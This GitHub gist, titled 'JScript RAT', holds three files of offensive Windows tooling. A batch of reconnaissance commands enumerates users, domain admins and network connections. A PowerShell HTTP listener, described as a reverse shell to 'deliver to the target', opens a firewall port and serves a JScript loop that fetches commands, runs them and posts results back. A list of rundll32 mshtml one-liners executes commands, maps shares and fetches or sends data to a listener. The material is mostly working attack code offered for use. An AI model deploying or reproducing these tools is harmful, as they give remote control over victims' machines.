Created
January 24, 2016 17:51
-
-
Save cephurs/fbfd972a3d66550f03d5 to your computer and use it in GitHub Desktop.
JScript RAT - The Beginning...
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Author: Casey Smith @subTee | |
| ipconfig /all>> C:\Tools\Debug\1.txt | |
| tasklist /v >> C:\Tools\Debug\1.txt | |
| net user >>C:\Tools\Debug\1.txt | |
| net localgroup administrators>>C:\Tools\Debug\1.txt | |
| netstat -ano >> C:\Tools\Debug\1.txt | |
| net use >> C:\Tools\Debug\1.txt | |
| net view >> C:\Tools\Debug\1.txt | |
| net view /domain >> C:\Tools\Debug\1.txt | |
| net group "domain users" /domain >> C:\Tools\Debug\1.txt | |
| net group "domain admins" /domain >> C:\Tools\Debug\1.txt | |
| net group "domain controllers" /domain >> C:\Tools\Debug\1.txt | |
| net group "domain computers" /domain >> C:\Tools\Debug\1.txt |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <# | |
| Author: Casey Smith @subTee | |
| .SYNOPSIS | |
| Simple Reverse Shell over HTTP. Deliver the link to the target and wait for connectback. | |
| .PARAMETER Server | |
| rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://127.0.0.1/connect",false);h.Send();B=h.ResponseText;eval(B) | |
| Listening Server IP Address | |
| #> | |
| $Server = '127.0.0.1' #Listening IP. Change This. | |
| function Receive-Request { | |
| param( | |
| $Request | |
| ) | |
| $output = "" | |
| $size = $Request.ContentLength64 + 1 | |
| $buffer = New-Object byte[] $size | |
| do { | |
| $count = $Request.InputStream.Read($buffer, 0, $size) | |
| $output += $Request.ContentEncoding.GetString($buffer, 0, $count) | |
| } until($count -lt $size) | |
| $Request.InputStream.Close() | |
| write-host $output | |
| } | |
| $listener = New-Object System.Net.HttpListener | |
| $listener.Prefixes.Add('http://+:80/') | |
| netsh advfirewall firewall delete rule name="PoshRat 80" | Out-Null | |
| netsh advfirewall firewall add rule name="PoshRat 80" dir=in action=allow protocol=TCP localport=80 | Out-Null | |
| $listener.Start() | |
| 'Listening ...' | |
| while ($true) { | |
| $context = $listener.GetContext() # blocks until request is received | |
| $request = $context.Request | |
| $response = $context.Response | |
| $hostip = $request.RemoteEndPoint | |
| #Use this for One-Liner Start | |
| if ($request.Url -match '/connect$' -and ($request.HttpMethod -eq "GET")) { | |
| write-host "Host Connected" -fore Cyan | |
| $message = ' | |
| while(true) | |
| { | |
| h = new ActiveXObject("WinHttp.WinHttpRequest.5.1"); | |
| h.Open("GET","http://'+$Server+'/rat",false); | |
| h.Send(); | |
| c = h.ResponseText; | |
| r = new ActiveXObject("WScript.Shell").Run(c); | |
| p=new ActiveXObject("WinHttp.WinHttpRequest.5.1"); | |
| p.Open("POST","http://'+$Server+'/rat",false); | |
| p.Send("Done"); | |
| } | |
| ' | |
| } | |
| if ($request.Url -match '/rat$' -and ($request.HttpMethod -eq "POST") ) { | |
| Receive-Request($request) | |
| } | |
| if ($request.Url -match '/rat$' -and ($request.HttpMethod -eq "GET")) { | |
| $response.ContentType = 'text/plain' | |
| $message = Read-Host "PS $hostip>" | |
| } | |
| [byte[]] $buffer = [System.Text.Encoding]::UTF8.GetBytes($message) | |
| $response.ContentLength64 = $buffer.length | |
| $output = $response.OutputStream | |
| $output.Write($buffer, 0, $buffer.length) | |
| $output.Close() | |
| } | |
| $listener.Stop() |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Author: Casey Smith @subTee | |
| //Execute A Command | |
| rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();new%20ActiveXObject("WScript.Shell").Run("calc"); | |
| //Write To A File | |
| rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";fso=new%20ActiveXObject("Scripting.FileSystemObject");a=fso.CreateTextFile("c:\\Temp\\testfile.txt",true);a.WriteLine("Test");a.Close();self.close; | |
| //Read and Execute From A File | |
| rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();fso=new%20ActiveXObject("Scripting.FileSystemObject");f=fso.OpenTextFile("c:\\Temp\\testfile.txt",1);eval((f.ReadAll())); | |
| //Map A Remote Share (WEBDAV) | |
| rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";n=new%20ActiveXObject('WScript.Network');n.MapNetworkDrive("S:","https://live.sysinternals.com");self.close; | |
| //Map A Local Share | |
| rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";n=new%20ActiveXObject('WScript.Network');n.MapNetworkDrive("S:","\\\\Localhost\\c$");self.close; | |
| //Read and Execute Commands From A File | |
| rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();fso=new%20ActiveXObject("Scripting.FileSystemObject");f=fso.OpenTextFile("c:\\Temp\\Commands.txt",1);while(!f.AtEndOfStream){t=new%20ActiveXObject("WScript.Shell");t.Run("cmd%20/c%20"%20+%20f.ReadLine(),null,true);}; | |
| //Retrieve Commands From HTTP | |
| rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://127.0.0.1/a.txt",false);h.Send();B=h.ResponseText;alert(B); | |
| //POST results back to Server | |
| rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("POST","http://127.0.0.1:8081/a.php",false);h.Send("Stuff"); |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment